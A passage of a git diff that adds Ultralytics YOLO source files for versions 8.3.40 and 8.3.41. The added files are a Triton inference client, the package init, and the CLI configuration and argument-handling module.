cv2.findContours(x, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0] + if c: + if strategy == "all": # merge and concatenate all segments + c = ( + np.concatenate(merge_multi_segment([x.reshape(-1, 2) for x in c])) + if len(c) > 1 + else c[0].reshape(-1, 2) + ) + elif strategy == "largest": # select largest segment + c = np.array(c[np.array([len(x) for x in c]).argmax()]).reshape(-1, 2) + else: + c = np.zeros((0, 2)) # no segments found + segments.append(c.astype("float32")) + return segments + + +def convert_torch2numpy_batch(batch: torch.Tensor) -> np.ndarray: + """ + Convert a batch of FP32 torch tensors (0.0-1.0) to a NumPy uint8 array (0-255), changing from BCHW to BHWC layout. + + Args: + batch (torch.Tensor): Input tensor batch of shape (Batch, Channels, Height, Width) and dtype torch.float32. + + Returns: + (np.ndarray): Output NumPy array batch of shape (Batch, Height, Width, Channels) and dtype uint8. + """ + return (batch.permute(0, 2, 3, 1).contiguous() * 255).clamp(0, 255).to(torch.uint8).cpu().numpy() + + +def clean_str(s): + """ + Cleans a string by replacing special characters with '_' character. + + Args: + s (str): a string needing special characters replaced + + Returns: + (str): a string with special characters replaced by an underscore _ + """ + return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) diff --git a/2024.ultralytics/v8.3.40/utils/triton.py b/2024.ultralytics/v8.3.40/utils/triton.py new file mode 100644 index 0000000..3f873a6 --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/triton.py @@ -0,0 +1,92 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from typing import List +from urllib.parse import urlsplit + +import numpy as np + + +class TritonRemoteModel: + """ + Client for interacting with a remote Triton Inference Server model. + + Attributes: + endpoint (str): The name of the model on the Triton server. + url (str): The URL of the Triton server. + triton_client: The Triton client (either HTTP or gRPC). + InferInput: The input class for the Triton client. + InferRequestedOutput: The output request class for the Triton client. + input_formats (List[str]): The data types of the model inputs. + np_input_formats (List[type]): The numpy data types of the model inputs. + input_names (List[str]): The names of the model inputs. + output_names (List[str]): The names of the model outputs. + """ + + def __init__(self, url: str, endpoint: str = "", scheme: str = ""): + """ + Initialize the TritonRemoteModel. + + Arguments may be provided individually or parsed from a collective 'url' argument of the form + ://// + + Args: + url (str): The URL of the Triton server. + endpoint (str): The name of the model on the Triton server. + scheme (str): The communication scheme ('http' or 'grpc'). + """ + if not endpoint and not scheme: # Parse all args from URL string + splits = urlsplit(url) + endpoint = splits.path.strip("/").split("/")[0] + scheme = splits.scheme + url = splits.netloc + + self.endpoint = endpoint + self.url = url + + # Choose the Triton client based on the communication scheme + if scheme == "http": + import tritonclient.http as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint) + else: + import tritonclient.grpc as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint, as_json=True)["config"] + + # Sort output names alphabetically, i.e. 'output0', 'output1', etc. + config["output"] = sorted(config["output"], key=lambda x: x.get("name")) + + # Define model attributes + type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8} + self.InferRequestedOutput = client.InferRequestedOutput + self.InferInput = client.InferInput + self.input_formats = [x["data_type"] for x in config["input"]] + self.np_input_formats = [type_map[x] for x in self.input_formats] + self.input_names = [x["name"] for x in config["input"]] + self.output_names = [x["name"] for x in config["output"]] + + def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]: + """ + Call the model with the given inputs. + + Args: + *inputs (List[np.ndarray]): Input data to the model. + + Returns: + (List[np.ndarray]): Model outputs. + """ + infer_inputs = [] + input_format = inputs[0].dtype + for i, x in enumerate(inputs): + if x.dtype != self.np_input_formats[i]: + x = x.astype(self.np_input_formats[i]) + infer_input = self.InferInput(self.input_names[i], [*x.shape], self.input_formats[i].replace("TYPE_", "")) + infer_input.set_data_from_numpy(x) + infer_inputs.append(infer_input) + + infer_outputs = [self.InferRequestedOutput(output_name) for output_name in self.output_names] + outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs) + + return [outputs.as_numpy(output_name).astype(input_format) for output_name in self.output_names] diff --git a/2024.ultralytics/v8.3.41/__init__.py b/2024.ultralytics/v8.3.41/__init__.py new file mode 100644 index 0000000..d2fd98b --- /dev/null +++ b/2024.ultralytics/v8.3.41/__init__.py @@ -0,0 +1,29 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +__version__ = "8.3.41" + +import os + +# Set ENV variables (place before imports) +if not os.environ.get("OMP_NUM_THREADS"): + os.environ["OMP_NUM_THREADS"] = "1" # default for reduced CPU utilization during training + +from ultralytics.models import NAS, RTDETR, SAM, YOLO, FastSAM, YOLOWorld +from ultralytics.utils import ASSETS, SETTINGS +from ultralytics.utils.checks import check_yolo as checks +from ultralytics.utils.downloads import download + +settings = SETTINGS +__all__ = ( + "__version__", + "ASSETS", + "YOLO", + "YOLOWorld", + "NAS", + "SAM", + "FastSAM", + "RTDETR", + "checks", + "download", + "settings", +) diff --git a/2024.ultralytics/v8.3.41/cfg/__init__.py b/2024.ultralytics/v8.3.41/cfg/__init__.py new file mode 100644 index 0000000..e4c239f --- /dev/null +++ b/2024.ultralytics/v8.3.41/cfg/__init__.py @@ -0,0 +1,1014 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import shutil +import subprocess +import sys +from pathlib import Path +from types import SimpleNamespace +from typing import Dict, List, Union + +import cv2 + +from ultralytics.utils import ( + ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + "help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track Objects Within Specific Zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())} source="path/to/video/file.mp4" + + 7. Run special commands: + yolo help + yolo checks + yolo version + yolo settings + yolo copy-cfg + yolo cfg + yolo solutions help + + Docs: https://docs.ultralytics.com + Solutions: https://docs.ultralytics.com/solutions/ + Community: https://community.ultralytics.com + GitHub: https://github.com/ultralytics/ultralytics + """ + +# Define keys for arg type checks +CFG_FLOAT_KEYS = { # integer or float arguments, i.e. x=2 and x=2.0 + "warmup_epochs", + "box", + "cls", + "dfl", + "degrees", + "shear", + "time", + "workspace", + "batch", +} +CFG_FRACTION_KEYS = { # fractional float arguments with 0.0<=values<=1.0 + "dropout", + "lr0", + "lrf", + "momentum", + "weight_decay", + "warmup_momentum", + "warmup_bias_lr", + "hsv_h", + "hsv_s", + "hsv_v", + "translate", + "scale", + "perspective", + "flipud", + "fliplr", + "bgr", + "mosaic", + "mixup", + "copy_paste", + "conf", + "iou", + "fraction", +} +CFG_INT_KEYS = { # integer-only arguments + "epochs", + "patience", + "workers", + "seed", + "close_mosaic", + "mask_ratio", + "max_det", + "vid_stride", + "line_width", + "nbs", + "save_period", +} +CFG_BOOL_KEYS = { # boolean-only arguments + "save", + "exist_ok", + "verbose", + "deterministic", + "single_cls", + "rect", + "cos_lr", + "overlap_mask", + "val", + "save_json", + "save_hybrid", + "half", + "dnn", + "plots", + "show", + "save_txt", + "save_conf", + "save_crop", + "save_frames", + "show_labels", + "show_conf", + "visualize", + "augment", + "agnostic_nms", + "retina_masks", + "show_boxes", + "keras", + "optimize", + "int8", + "dynamic", + "simplify", + "nms", + "profile", + "multi_scale", +} + + +def cfg2dict(cfg): + """ + Converts a configuration object to a dictionary. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration object to be converted. Can be a file path, + a string, a dictionary, or a SimpleNamespace object. + + Returns: + (Dict): Configuration object in dictionary format. + + Examples: + Convert a YAML file path to a dictionary: + >>> config_dict = cfg2dict("config.yaml") + + Convert a SimpleNamespace to a dictionary: + >>> from types import SimpleNamespace + >>> config_sn = SimpleNamespace(param1="value1", param2="value2") + >>> config_dict = cfg2dict(config_sn) + + Pass through an already existing dictionary: + >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"}) + + Notes: + - If cfg is a path or string, it's loaded as YAML and converted to a dictionary. + - If cfg is a SimpleNamespace object, it's converted to a dictionary using vars(). + - If cfg is already a dictionary, it's returned unchanged. + """ + if isinstance(cfg, (str, Path)): + cfg = yaml_load(cfg) # load dict + elif isinstance(cfg, SimpleNamespace): + cfg = vars(cfg) # convert to dict + return cfg + + +def get_cfg(cfg: Union[str, Path, Dict, SimpleNamespace] = DEFAULT_CFG_DICT, overrides: Dict = None): + """ + Load and merge configuration data from a file or dictionary, with optional overrides. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration data source. Can be a file path, dictionary, or + SimpleNamespace object. + overrides (Dict | None): Dictionary containing key-value pairs to override the base configuration. + + Returns: + (SimpleNamespace): Namespace containing the merged configuration arguments. + + Examples: + >>> from ultralytics.cfg import get_cfg + >>> config = get_cfg() # Load default configuration + >>> config = get_cfg("path/to/config.yaml", overrides={"epochs": 50, "batch_size": 16}) + + Notes: + - If both `cfg` and `overrides` are provided, the values in `overrides` will take precedence. + - Special handling ensures alignment and correctness of the configuration, such as converting numeric + `project` and `name` to strings and validating configuration keys and values. + - The function performs type and value checks on the configuration data. + """ + cfg = cfg2dict(cfg) + + # Merge overrides + if overrides: + overrides = cfg2dict(overrides) + if "save_dir" not in cfg: + overrides.pop("save_dir", None) # special override keys to ignore + check_dict_alignment(cfg, overrides) + cfg = {**cfg, **overrides} # merge cfg and overrides dicts (prefer overrides) + + # Special handling for numeric project/name + for k in "project", "name": + if k in cfg and isinstance(cfg[k], (int, float)): + cfg[k] = str(cfg[k]) + if cfg.get("name") == "model": # assign model to 'name' arg + cfg["name"] = cfg.get("model", "").split(".")[0] + LOGGER.warning(f"WARNING ⚠️ 'name=model' automatically updated to 'name={cfg['name']}'.") + + # Type and Value checks + check_cfg(cfg) + + # Return instance + return IterableSimpleNamespace(**cfg) + + +def check_cfg(cfg, hard=True): + """ + Checks configuration argument types and values for the Ultralytics library. + + This function validates the types and values of configuration arguments, ensuring correctness and converting + them if necessary. It checks for specific key types defined in global variables such as CFG_FLOAT_KEYS, + CFG_FRACTION_KEYS, CFG_INT_KEYS, and CFG_BOOL_KEYS. + + Args: + cfg (Dict): Configuration dictionary to validate. + hard (bool): If True, raises exceptions for invalid types and values; if False, attempts to convert them. + + Examples: + >>> config = { + ... "epochs": 50, # valid integer + ... "lr0": 0.01, # valid float + ... "momentum": 1.2, # invalid float (out of 0.0-1.0 range) + ... "save": "true", # invalid bool + ... } + >>> check_cfg(config, hard=False) + >>> print(config) + {'epochs': 50, 'lr0': 0.01, 'momentum': 1.2, 'save': False} # corrected 'save' key + + Notes: + - The function modifies the input dictionary in-place. + - None values are ignored as they may be from optional arguments. + - Fraction keys are checked to be within the range [0.0, 1.0]. + """ + for k, v in cfg.items(): + if v is not None: # None values may be from optional args + if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = float(v) + elif k in CFG_FRACTION_KEYS: + if not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = v = float(v) + if not (0.0 <= v <= 1.0): + raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.") + elif k in CFG_INT_KEYS and not isinstance(v, int): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')" + ) + cfg[k] = int(v) + elif k in CFG_BOOL_KEYS and not isinstance(v, bool): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')" + ) + cfg[k] = bool(v) + + +def get_save_dir(args, name=None): + """ + Returns the directory path for saving outputs, derived from arguments or default settings. + + Args: + args (SimpleNamespace): Namespace object containing configurations such as 'project', 'name', 'task', + 'mode', and 'save_dir'. + name (str | None): Optional name for the output directory. If not provided, it defaults to 'args.name' + or the 'args.mode'. + + Returns: + (Path): Directory path where outputs should be saved. + + Examples: + >>> from types import SimpleNamespace + >>> args = SimpleNamespace(project="my_project", task="detect", mode="train", exist_ok=True) + >>> save_dir = get_save_dir(args) + >>> print(save_dir) + my_project/detect/train + """ + if getattr(args, "save_dir", None): + save_dir = args.save_dir + else: + from ultralytics.utils.files import increment_path + + project = args.project or (ROOT.parent / "tests/tmp/runs" if TESTS_RUNNING else RUNS_DIR) / args.task + name = name or args.name or f"{args.mode}" + save_dir = increment_path(Path(project) / name, exist_ok=args.exist_ok if RANK in {-1, 0} else True) + + return Path(save_dir) + + +def _handle_deprecation(custom): + """ + Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings. + + Args: + custom (Dict): Configuration dictionary potentially containing deprecated keys. + + Examples: + >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2} + >>> _handle_deprecation(custom_config) + >>> print(custom_config) + {'show_boxes': True, 'show_labels': True, 'line_width': 2} + + Notes: + This function modifies the input dictionary in-place, replacing deprecated keys with their current + equivalents. It also handles value conversions where necessary, such as inverting boolean values for + 'hide_labels' and 'hide_conf'. + """ + for key in custom.copy().keys(): + if key == "boxes": + deprecation_warn(key, "show_boxes") + custom["show_boxes"] = custom.pop("boxes") + if key == "hide_labels": + deprecation_warn(key, "show_labels") + custom["show_labels"] = custom.pop("hide_labels") == "False" + if key == "hide_conf": + deprecation_warn(key, "show_conf") + custom["show_conf"] = custom.pop("hide_conf") == "False" + if key == "line_thickness": + deprecation_warn(key, "line_width") + custom["line_width"] = custom.pop("line_thickness") + if key == "label_smoothing": + deprecation_warn(key) + custom.pop("label_smoothing") + + return custom + + +def check_dict_alignment(base: Dict, custom: Dict, e=None): + """ + Checks alignment between custom and base configuration dictionaries, handling deprecated keys and providing error + messages for mismatched keys. + + Args: + base (Dict): The base configuration dictionary containing valid keys. + custom (Dict): The custom configuration dictionary to be checked for alignment. + e (Exception | None): Optional error instance passed by the calling function. + + Raises: + SystemExit: If mismatched keys are found between the custom and base dictionaries. + + Examples: + >>> base_cfg = {"epochs": 50, "lr0": 0.01, "batch_size": 16} + >>> custom_cfg = {"epoch": 100, "lr": 0.02, "batch_size": 32} + >>> try: + ... check_dict_alignment(base_cfg, custom_cfg) + ... except SystemExit: + ... print("Mismatched keys found") + + Notes: + - Suggests corrections for mismatched keys based on similarity to valid keys. + - Automatically replaces deprecated keys in the custom configuration with updated equivalents. + - Prints detailed error messages for each mismatched key to help users correct their configurations. + """ + custom = _handle_deprecation(custom) + base_keys, custom_keys = (set(x.keys()) for x in (base, custom)) + mismatched = [k for k in custom_keys if k not in base_keys] + if mismatched: + from difflib import get_close_matches + + string = "" + for x in mismatched: + matches = get_close_matches(x, base_keys) # key list + matches = [f"{k}={base[k]}" if base.get(k) is not None else k for k in matches] + match_str = f"Similar arguments are i.e. {matches}." if matches else "" + string += f"'{colorstr('red', 'bold', x)}' is not a valid YOLO argument. {match_str}\n" + raise SyntaxError(string + CLI_HELP_MSG) from e + + +def merge_equals_args(args: List[str]) -> List[str]: + """ + Merges arguments around isolated '=' in a list of strings and joins fragments with brackets. + + This function handles the following cases: + 1. ['arg', '=', 'val'] becomes ['arg=val'] + 2. ['arg=', 'val'] becomes ['arg=val'] + 3. ['arg', '=val'] becomes ['arg=val'] + 4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]'] + + Args: + args (List[str]): A list of strings where each element represents an argument or fragment. + + Returns: + List[str]: A list of strings where the arguments around isolated '=' are merged and fragments with brackets are joined. + + Examples: + >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"] + >>> merge_and_join_args(args) + ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]'] + """ + new_args = [] + current = "" + depth = 0 + + i = 0 + while i < len(args): + arg = args[i] + + # Handle equals sign merging + if arg == "=" and 0 < i < len(args) - 1: # merge ['arg', '=', 'val'] + new_args[-1] += f"={args[i + 1]}" + i += 2 + continue + elif arg.endswith("=") and i < len(args) - 1 and "=" not in args[i + 1]: # merge ['arg=', 'val'] + new_args.append(f"{arg}{args[i + 1]}") + i += 2 + continue + elif arg.startswith("=") and i > 0: # merge ['arg', '=val'] + new_args[-1] += arg + i += 1 + continue + + # Handle bracket joining + depth += arg.count("[") - arg.count("]") + current += arg + if depth == 0: + new_args.append(current) + current = "" + + i += 1 + + # Append any remaining current string + if current: + new_args.append(current) + + return new_args + + +def handle_yolo_hub(args: List[str]) -> None: + """ + Handles Ultralytics HUB command-line interface (CLI) commands for authentication. + + This function processes Ultralytics HUB CLI commands such as login and logout. It should be called when executing a + script with arguments related to HUB authentication. + + Args: + args (List[str]): A list of command line arguments. The first argument should be either 'login' + or 'logout'. For 'login', an optional second argument can be the API key. + + Examples: + ```bash + yolo login YOUR_API_KEY + ``` + + Notes: + - The function imports the 'hub' module from ultralytics to perform login and logout operations. + - For the 'login' command, if no API key is provided, an empty string is passed to the login function. + - The 'logout' command does not require any additional arguments. + """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. + - For more information on handling YOLO settings, visit: + https://docs.ultralytics.com/quickstart/#ultralytics-settings + """ + url = "https://docs.ultralytics.com/quickstart/#ultralytics-settings" # help URL + try: + if any(args): + if args[0] == "reset": + SETTINGS_FILE.unlink() # delete the settings file + SETTINGS.reset() # create new settings + LOGGER.info("Settings reset successfully") # inform the user that settings have been reset + else: # save a new setting + new = dict(parse_key_value_pair(a) for a in args) + check_dict_alignment(SETTINGS, new) + SETTINGS.update(new) + + print(SETTINGS) # print the current settings + LOGGER.info(f"💡 Learn more about Ultralytics Settings at {url}") + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ settings error: '{e}'. Please see {url} for help.") + + +def handle_yolo_solutions(args: List[str]) -> None: + """ + Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline. + + Args: + args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO + solutions: https://docs.ultralytics.com/solutions/, It can include solution name, source, + and other configuration parameters. + + Returns: + None: The function processes video frames and saves the output but doesn't return any value. + + Examples: + Run people counting solution with default settings: + >>> handle_yolo_solutions(["count"]) + + Run analytics with custom configuration: + >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"]) + + Notes: + - Default configurations are merged from DEFAULT_SOL_DICT and DEFAULT_CFG_DICT + - Arguments can be provided in the format 'key=value' or as boolean flags + - Available solutions are defined in SOLUTION_MAP with their respective classes and methods + - If an invalid solution is provided, defaults to 'count' solution + - Output videos are saved in 'runs/solution/{solution_name}' directory + - For 'analytics' solution, frame numbers are tracked for generating analytical graphs + - Video processing can be interrupted by pressing 'q' + - Processes video frames sequentially and saves output in .avi format + - If no source is specified, downloads and uses a default sample video + """ + full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT} # arguments dictionary + overrides = {} + + # check dictionary alignment + for arg in merge_equals_args(args): + arg = arg.lstrip("-").rstrip(",") + if "=" in arg: + try: + k, v = parse_key_value_pair(arg) + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {arg: ""}, e) + elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool): + overrides[arg] = True + check_dict_alignment(full_args_dict, overrides) # dict alignment + + # Get solution name + if args and args[0] in SOLUTION_MAP: + if args[0] != "help": + s_n = args.pop(0) # Extract the solution name directly + else: + LOGGER.info(SOLUTIONS_HELP_MSG) + else: + LOGGER.warning( + f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}" + ) + s_n = "count" # Default solution if none provided + + if args and args[0] == "help": # Add check for return if user call `yolo solutions help` + return + + cls, method = SOLUTION_MAP[s_n] # solution class name, method name and default source + + from ultralytics import solutions # import ultralytics solutions + + solution = getattr(solutions, cls)(IS_CLI=True, **overrides) # get solution class i.e ObjectCounter + process = getattr(solution, method) # get specific function of class for processing i.e, count from ObjectCounter + + cap = cv2.VideoCapture(solution.CFG["source"]) # read the video file + + # extract width, height and fps of the video file, create save directory and initialize video writer + import os # for directory creation + from pathlib import Path + + from ultralytics.utils.files import increment_path # for output directory path update + + w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS)) + if s_n == "analytics": # analytical graphs follow fixed shape for output i.e w=1920, h=1080 + w, h = 1920, 1080 + save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False) + save_dir.mkdir(parents=True, exist_ok=True) # create the output directory + vw = cv2.VideoWriter(os.path.join(save_dir, "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h)) + + try: # Process video frames + f_n = 0 # frame number, required for analytical graphs + while cap.isOpened(): + success, frame = cap.read() + if not success: + break + frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame) + vw.write(frame) + if cv2.waitKey(1) & 0xFF == ord("q"): + break + finally: + cap.release() + + +def handle_streamlit_inference(): + """ + Open the Ultralytics Live Inference Streamlit app for real-time object detection. + + This function initializes and runs a Streamlit application designed for performing live object detection using + Ultralytics models. It checks for the required Streamlit package and launches the app. + + Examples: + >>> handle_streamlit_inference() + + Notes: + - Requires Streamlit version 1.29.0 or higher. + - The app is launched using the 'streamlit run' command. + - The Streamlit app file is located in the Ultralytics package directory. + """ + checks.check_requirements("streamlit>=1.29.0") + LOGGER.info("💡 Loading Ultralytics Live Inference app...") + subprocess.run(["streamlit", "run", ROOT / "solutions/streamlit_inference.py", "--server.headless", "true"]) + + +def parse_key_value_pair(pair: str = "key=value"): + """ + Parses a key-value pair string into separate key and value components. + + Args: + pair (str): A string containing a key-value pair in the format "key=value". + + Returns: + key (str): The parsed key. + value (str): The parsed value. + + Raises: + AssertionError: If the value is missing or empty. + + Examples: + >>> key, value = parse_key_value_pair("model=yolo11n.pt") + >>> print(f"Key: {key}, Value: {value}") + Key: model, Value: yolo11n.pt + + >>> key, value = parse_key_value_pair("epochs=100") + >>> print(f"Key: {key}, Value: {value}") + Key: epochs, Value: 100 + + Notes: + - The function splits the input string on the first '=' character. + - Leading and trailing whitespace is removed from both key and value. + - An assertion error is raised if the value is empty after stripping. + """ + k, v = pair.split("=", 1) # split on first '=' sign + k, v = k.strip(), v.strip() # remove spaces + assert v, f"missing '{k}' value" + return k, smart_value(v) + + +def smart_value(v): + """ + Converts a string representation of a value to its appropriate Python type. + + This function attempts to convert a given string into a Python object of the most appropriate type. It handles + conversions to None, bool, int, float, and other types that can be evaluated safely. + + Args: + v (str): The string representation of the value to be converted. + + Returns: + (Any): The converted value. The type can be None, bool, int, float, or the original string if no conversion + is applicable. + + Examples: + >>> smart_value("42") + 42 + >>> smart_value("3.14") + 3.14 + >>> smart_value("True") + True + >>> smart_value("None") + None + >>> smart_value("some_string") + 'some_string' + + Notes: + - The function uses a case-insensitive comparison for boolean and None values. + - For other types, it attempts to use Python's eval() function, which can be unsafe if used on untrusted input. + - If no conversion is possible, the original string is returned. + """ + v_lower = v.lower() + if v_lower == "none": + return None + elif v_lower == "true": + return True + elif v_lower == "false": + return False + else: + try: + return eval(v) + except Exception: + return v + + +def entrypoint(debug=""): + """ + Ultralytics entrypoint function for parsing and executing command-line arguments. + + This function serves as the main entry point for the Ultralytics CLI, parsing command-line arguments and + executing the corresponding tasks such as training, validation, prediction, exporting models, and more. + + Args: + debug (str): Space-separated string of command-line arguments for debugging purposes. + + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. imgsz=320 + for a in merge_equals_args(args): # merge 